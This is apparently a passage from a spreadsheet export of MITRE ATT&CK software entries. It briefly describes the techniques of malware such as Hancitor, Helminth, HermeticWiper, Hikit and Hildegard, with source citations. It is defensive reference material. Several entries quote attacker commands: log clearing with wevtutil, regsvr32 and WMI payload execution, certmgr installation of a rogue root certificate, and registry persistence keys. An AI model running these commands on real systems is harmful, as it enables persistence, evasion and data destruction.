    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070)'s installer contains a malicious file named navlu.dll to decrypt and run the RAT. navlu.dll is also the name of a legitimate Symantec DLL.(Citation: ZScaler Hacking Team)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070)'s code may be obfuscated through structured exception handling and return-oriented programming.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) has established persistence by setting the &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; key value for &lt;code&gt;wdm&lt;/code&gt; to the path of the executable. It has also used the Registry entry &lt;code&gt;HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run vpdn “%ALLUSERPROFILE%\%APPDATA%\vpdn\VPDN_LU.exe”&lt;/code&gt; to establish persistence.(Citation: ZScaler Hacking Team)(Citation: ThreatStream Evasion Analysis)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) has used HTTP and HTTPS for command and control.(Citation: Dell TG-3390)(Citation: ThreatStream Evasion Analysis)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) is capable of spawning a reverse shell on a victim.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[Hacking Team UEFI Rootkit](https://attack.mitre.org/software/S0047) is a UEFI BIOS rootkit developed by the company Hacking Team to persist remote access software on some targeted systems.(Citation: TrendMicro Hacking Team UEFI)</t>
  </si>
  <si>
    <t xml:space="preserve">[Hacking Team UEFI Rootkit](https://attack.mitre.org/software/S0047) is a UEFI BIOS rootkit developed by the company Hacking Team to persist remote access software on some targeted systems.(Citation: TrendMicro Hacking Team UEFI) </t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has decoded Base64 encoded URLs to insert a recipient’s name into the filename of the Word document. [Hancitor](https://attack.mitre.org/software/S0499) has also extracted executables from ZIP files.(Citation: Threatpost Hancitor)(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has deleted files using the VBA &lt;code&gt;kill&lt;/code&gt; function.(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has the ability to download additional files from C2.(Citation: Threatpost Hancitor)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has used malicious Microsoft Word documents, sent via email, which prompted the victim to enable macros.(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has relied upon users clicking on a malicious link delivered through phishing.(Citation: Threatpost Hancitor)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has used &lt;code&gt;CallWindowProc&lt;/code&gt; and &lt;code&gt;EnumResourceTypesA&lt;/code&gt; to interpret and execute shellcode.(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has used Base64 to encode malicious links. [Hancitor](https://attack.mitre.org/software/S0499) has also delivered compressed payloads in ZIP files to victims.(Citation: Threatpost Hancitor)(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has used PowerShell to execute commands.(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499)  has added Registry Run keys to establish persistence.(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has been delivered via phishing emails with malicious attachments.(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has been delivered via phishing emails which contained malicious links.(Citation: Threatpost Hancitor)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has used verclsid.exe to download and execute a malicious script.(Citation: Red Canary Verclsid.exe)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has used a macro to check that an ActiveDocument shape object in the lure message is present. If this object is not found, the macro will exit without downloading additional payloads.(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>[Havij](https://attack.mitre.org/software/S0224) is used to automate SQL injection.(Citation: Check Point Havij Analysis)</t>
  </si>
  <si>
    <t>A [Helminth](https://attack.mitre.org/software/S0170) VBScript receives a batch script to execute a set of commands in a command prompt.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>The executable version of [Helminth](https://attack.mitre.org/software/S0170) has a module to log clipboard contents.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) samples have been signed with legitimate, compromised code signing certificates owned by software company AI Squared.(Citation: ClearSky OilRig Jan 2017)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) can use DNS for C2.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) splits data into chunks up to 23 bytes and sends the data in DNS queries to its C2 server.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) has checked for the domain admin group and Exchange Trusted Subsystem groups using the commands &lt;code&gt;net group Exchange Trusted Subsystem /domain&lt;/code&gt; and &lt;code&gt;net group domain admins /domain&lt;/code&gt;.(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) can download additional files.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>The executable version of [Helminth](https://attack.mitre.org/software/S0170) has a module to log keystrokes.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) creates folders to store output from batch scripts prior to sending the information to its C2 server.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) has checked the local administrators group.(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>The [Helminth](https://attack.mitre.org/software/S0170) config file is encrypted with RC4.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>One version of [Helminth](https://attack.mitre.org/software/S0170) uses a PowerShell script.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) has used [Tasklist](https://attack.mitre.org/software/S0057) to get information on processes.(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) establishes persistence by creating a shortcut in the Start Menu folder.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) has used a scheduled task for persistence.(Citation: ClearSky OilRig Jan 2017)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) establishes persistence by creating a shortcut.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>For C2 over HTTP, [Helminth](https://attack.mitre.org/software/S0170) encodes data with base64 and sends it via the "Cookie" field of HTTP requests. For C2 over DNS, [Helminth](https://attack.mitre.org/software/S0170) converts ASCII characters into their hexadecimal values and sends the data in cleartext.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) encrypts data sent to its C2 server over HTTP with RC4.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>One version of [Helminth](https://attack.mitre.org/software/S0170) consists of VBScript scripts.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) can use HTTP for C2.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) can provide a remote shell. One version of [Helminth](https://attack.mitre.org/software/S0170) uses batch scripting.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) can use `AdjustTokenPrivileges` to grant itself privileges for debugging with `SeDebugPrivilege`, creating backups with `SeBackupPrivilege`, loading drivers with `SeLoadDriverPrivilege`, and shutting down a local system with `SeShutdownPrivilege`.(Citation: Qualys Hermetic Wiper March 2022)(Citation: Crowdstrike DriveSlayer February 2022)</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) can overwrite the `C:\Windows\System32\winevt\Logs` file on a targeted system.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>The [HermeticWiper](https://attack.mitre.org/software/S0697) executable has been signed with a legitimate certificate issued to Hermetica Digital Ltd.(Citation: Symantec Ukraine Wipers February 2022)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: ESET Hermetic Wiper February 2022)(Citation: Qualys Hermetic Wiper March 2022)</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) can recursively wipe folders and files in `Windows`, `Program Files`, `Program Files(x86)`, `PerfLogs`, `Boot, System`, `Volume Information`, and `AppData` folders using `FSCTL_MOVE_FILE`. [HermeticWiper](https://attack.mitre.org/software/S0697) can also overwrite symbolic links and big files in `My Documents` and on the Desktop with random bytes.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) can decompress and copy driver files using `LZCopy`.(Citation: Crowdstrike DriveSlayer February 2022)</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) has the ability to corrupt disk partitions and obtain raw disk access to destroy data.(Citation: Crowdstrike DriveSlayer February 2022)(Citation: SentinelOne Hermetic Wiper February 2022)</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) has the ability to corrupt disk partitions, damage the Master Boot Record (MBR), and overwrite the Master File Table (MFT) of all available physical drives.(Citation: SentinelOne Hermetic Wiper February 2022)(Citation: Symantec Ukraine Wipers February 2022)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Qualys Hermetic Wiper March 2022)</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) has the ability to overwrite its own file with random bites.(Citation: Crowdstrike DriveSlayer February 2022)(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) can enumerate common folders such as My Documents, Desktop, and AppData.(Citation: SentinelOne Hermetic Wiper February 2022)(Citation: Qualys Hermetic Wiper March 2022)</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) has the ability to deploy through an infected system's default domain policy.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) has the ability to set the `HKLM:\SYSTEM\\CurrentControlSet\\Control\\CrashControl\CrashDumpEnabled` Registry key to `0` in order to disable crash dumps.(Citation: SentinelOne Hermetic Wiper February 2022)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Qualys Hermetic Wiper March 2022)</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) can disable pop-up information about folders and desktop items and delete Registry keys to hide malicious services.(Citation: Crowdstrike DriveSlayer February 2022)(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) can disable the VSS service on a compromised host using the service control manager.(Citation: Crowdstrike DriveSlayer February 2022)(Citation: ESET Hermetic Wizard March 2022)(Citation: Qualys Hermetic Wiper March 2022)</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) has used the name `postgressql.exe` to mask a malicious payload.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) has the ability to modify Registry keys to disable crash dumps, colors for compressed files, and pop-up information about folders and desktop items.(Citation: SentinelOne Hermetic Wiper February 2022)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Qualys Hermetic Wiper March 2022)</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) can call multiple Windows API functions used for privilege escalation, service execution, and to overwrite random bites of data.(Citation: SentinelOne Hermetic Wiper February 2022)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: ESET Hermetic Wizard March 2022)(Citation: Qualys Hermetic Wiper March 2022)</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) can compress 32-bit and 64-bit driver files with the Lempel-Ziv algorithm.(Citation: Symantec Ukraine Wipers February 2022)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Qualys Hermetic Wiper March 2022)</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) has the ability to use scheduled tasks for execution.(Citation: Symantec Ukraine Wipers February 2022)</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) can create system services to aid in executing the payload.(Citation: SentinelOne Hermetic Wiper February 2022)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Qualys Hermetic Wiper March 2022)</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) has the ability to stop the Volume Shadow Copy service.(Citation: Qualys Hermetic Wiper March 2022)</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) can determine the OS version, bitness, and enumerate physical drives on a targeted host.(Citation: SentinelOne Hermetic Wiper February 2022)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: ESET Hermetic Wizard March 2022)(Citation: Qualys Hermetic Wiper March 2022)</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) can initiate a system shutdown.(Citation: SentinelOne Hermetic Wiper February 2022)(Citation: Qualys Hermetic Wiper March 2022)</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) has the ability to receive a command parameter to sleep prior to carrying out destructive actions on a targeted host.(Citation: Crowdstrike DriveSlayer February 2022)</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) can use `cmd.exe /Q/c move CSIDL_SYSTEM_DRIVE\temp\sys.tmp1 CSIDL_WINDOWS\policydefinitions\postgresql.exe 1&gt; \\127.0.0.1\ADMIN$\_1636727589.6007507 2&gt;&amp;1` to deploy on an infected system.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) can load drivers by creating a new service using the `CreateServiceW` API.(Citation: Crowdstrike DriveSlayer February 2022)</t>
  </si>
  <si>
    <t>[HermeticWizard](https://attack.mitre.org/software/S0698) has the ability to use `wevtutil cl system` to clear event logs.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>[HermeticWizard](https://attack.mitre.org/software/S0698) has been signed by valid certificates assigned to Hermetica Digital.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>[HermeticWizard](https://attack.mitre.org/software/S0698) can execute files on remote machines using DCOM.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>[HermeticWizard](https://attack.mitre.org/software/S0698) can copy files to other machines on a compromised network.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>[HermeticWizard](https://attack.mitre.org/software/S0698) has been named `exec_32.dll` to mimic a legitimate MS Outlook .dll.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>[HermeticWizard](https://attack.mitre.org/software/S0698) can connect to remote shares using `WNetAddConnection2W`.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>[HermeticWizard](https://attack.mitre.org/software/S0698) has the ability to scan ports on a compromised network.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>[HermeticWizard](https://attack.mitre.org/software/S0698) has the ability to encrypt PE files with a reverse XOR loop.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>[HermeticWizard](https://attack.mitre.org/software/S0698) can use a list of hardcoded credentials in attempt to authenticate to SMB shares.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>[HermeticWizard](https://attack.mitre.org/software/S0698) has used `regsvr32.exe /s /i` to execute malicious payloads.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>[HermeticWizard](https://attack.mitre.org/software/S0698) can find machines on the local network by gathering known local IP addresses through `DNSGetCacheDataTable`, `GetIpNetTable`,`WNetOpenEnumW(RESOURCE_GLOBALNET, RESOURCETYPE_ANY)`,`NetServerEnum`,`GetTcpTable`, and `GetAdaptersAddresses.`(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>[HermeticWizard](https://attack.mitre.org/software/S0698) has the ability to create a new process using `rundll32`.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>[HermeticWizard](https://attack.mitre.org/software/S0698) can use a list of hardcoded credentials to to authenticate via NTLMSSP to the SMB shares on remote systems.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>[HermeticWizard](https://attack.mitre.org/software/S0698) can use `OpenRemoteServiceManager` to create a service.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>[HermeticWizard](https://attack.mitre.org/software/S0698) can use `cmd.exe` for execution on compromised hosts.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>[HermeticWizard](https://attack.mitre.org/software/S0698) can use WMI to create a new process on a remote machine via `C:\windows\system32\cmd.exe /c start C:\windows\system32\\regsvr32.exe /s /iC:\windows\&lt;filename&gt;.dll`.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>[Heyoka Backdoor](https://attack.mitre.org/software/S1027) can use DNS tunneling for C2 communications.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[Heyoka Backdoor](https://attack.mitre.org/software/S1027) can decrypt its payload prior to execution.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[Heyoka Backdoor](https://attack.mitre.org/software/S1027) can inject a DLL into rundll32.exe for execution.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[Heyoka Backdoor](https://attack.mitre.org/software/S1027) has the ability to delete folders and files from a targeted system.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[Heyoka Backdoor](https://attack.mitre.org/software/S1027) has the ability to search the compromised host for files.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[Heyoka Backdoor](https://attack.mitre.org/software/S1027) has been spread through malicious document lures.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[Heyoka Backdoor](https://attack.mitre.org/software/S1027) has been named `srvdll.dll` to appear as a legitimate service.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[Heyoka Backdoor](https://attack.mitre.org/software/S1027) can encrypt its payload.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[Heyoka Backdoor](https://attack.mitre.org/software/S1027) can identify removable media attached to victim's machines.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[Heyoka Backdoor](https://attack.mitre.org/software/S1027) can gather process information.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[Heyoka Backdoor](https://attack.mitre.org/software/S1027) can use spoofed DNS requests to create a bidirectional tunnel between a compromised host and its C2 servers.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[Heyoka Backdoor](https://attack.mitre.org/software/S1027) can establish persistence with the auto start function including using the value `EverNoteTrayUService`.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[Heyoka Backdoor](https://attack.mitre.org/software/S1027) can use rundll32.exe to gain execution.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[Heyoka Backdoor](https://attack.mitre.org/software/S1027) can enumerate drives on a compromised host.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[Heyoka Backdoor](https://attack.mitre.org/software/S1027) can check if it is running as a service on a compromised host.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) encrypts C2 traffic with TLS.(Citation: Fidelis Hi-Zor)</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) deletes its RAT installer file as it executes its DLL payload file.(Citation: Fidelis INOCNATION)</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) has the ability to upload and download files from its C2 server.(Citation: Fidelis INOCNATION)</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) uses various XOR techniques to obfuscate its components.(Citation: Fidelis INOCNATION)</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) creates a Registry Run key to establish persistence.(Citation: Fidelis INOCNATION)</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) executes using regsvr32.exe called from the [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001) persistence mechanism.(Citation: Fidelis INOCNATION)</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) encrypts C2 traffic with a double XOR using two distinct single-byte keys.(Citation: Fidelis Hi-Zor)</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) communicates with its C2 server over HTTPS.(Citation: Fidelis INOCNATION)</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) has the ability to create a reverse shell.(Citation: Fidelis INOCNATION)</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) uses a cipher to implement a decoding function.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) adds itself as a shared object to the LD_PRELOAD environment variable.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) downloads a tar compressed archive from a download server to the system.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) creates a user account as a means to provide initial persistence to the compromised machine.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) communicates with a simple network protocol over TCP.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) encrypts its configuration and payload.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) installs reboot persistence by adding itself to &lt;code&gt;/etc/rc.local&lt;/code&gt;.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) uses a rootkit to hook and implement functions on the system.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) uses an RC4-like algorithm with an already computed PRGA generated key-stream for network communication.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) uses a script to automate tasks on the victim's machine and to assist in execution.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) has attempted to disable driver signing verification by tampering with several Registry keys prior to the loading of a rootkit driver component.(Citation: FireEye HIKIT Rootkit Part 2)</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) has used [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001) to load &lt;code&gt;oci.dll&lt;/code&gt; as a persistence mechanism.(Citation: FireEye Hikit Rootkit)</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) can upload files from compromised machines.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) has the ability to download files to a compromised host.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) uses &lt;code&gt;certmgr.exe -add GlobalSign.cer -c -s -r localMachine Root&lt;/code&gt; and &lt;code&gt;certmgr.exe -add GlobalSign.cer -c -s -r localMachineTrustedPublisher&lt;/code&gt; to install a self-generated certificate to the local trust store as a root CA and Trusted Publisher.(Citation: FireEye HIKIT Rootkit Part 2)</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) supports peer connections.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) has been spread through spear phishing.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t xml:space="preserve">[Hikit](https://attack.mitre.org/software/S0009) is a [Rootkit](https://attack.mitre.org/techniques/T1014) that has been used by [Axiom](https://attack.mitre.org/groups/G0001).(Citation: FireEye Hikit Rootkit) (Citation: FireEye HIKIT Rootkit Part 2) </t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) performs XOR encryption.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) has used HTTP for C2.(Citation: FireEye HIKIT Rootkit Part 2)</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) has the ability to create a remote shell and run given commands.(Citation: FireEye HIKIT Rootkit Part 2)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has used an IRC channel for C2 communications.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has used history -c to clear script shell logs.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has queried the Cloud Instance Metadata API for cloud credentials.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) was executed through the kubelet API run command and by executing commands on running containers.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t xml:space="preserve">[Hildegard](https://attack.mitre.org/software/S0601) has used masscan to search for kubelets and the kubelet API for additional running containers.(Citation: Unit 42 Hildegard Malware) </t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has searched for SSH keys, Docker credentials, and Kubernetes service tokens.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has decrypted ELF files with AES.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has modified DNS resolvers to evade DNS monitoring tools.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has modified /etc/ld.so.preload to intercept shared library import functions.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t xml:space="preserve">[Hildegard](https://attack.mitre.org/software/S0601) has used the BOtB tool that can break out of containers. (Citation: Unit 42 Hildegard Malware) </t>
  </si>
  <si>
    <t xml:space="preserve">[Hildegard](https://attack.mitre.org/software/S0601) has used the BOtB tool which exploits CVE-2019-5736.(Citation: Unit 42 Hildegard Malware) </t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) was executed through an unsecure kubelet that allowed anonymous access to the victim environment.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t xml:space="preserve">[Hildegard](https://attack.mitre.org/software/S0601) has deleted scripts after execution.(Citation: Unit 42 Hildegard Malware) </t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has downloaded additional scripts that build and run Monero cryptocurrency miners.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has created a user named “monerodaemon”.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has disguised itself as a known Linux process.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has used masscan to look for kubelets in the internal Kubernetes network.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has encrypted an ELF file.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has searched for private keys in .ssh.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has established tmate sessions for C2 communications.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has used xmrig to mine cryptocurrency.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has modified /etc/ld.so.preload to overwrite readdir() and readdir64().(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has packed ELF files into other binaries.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
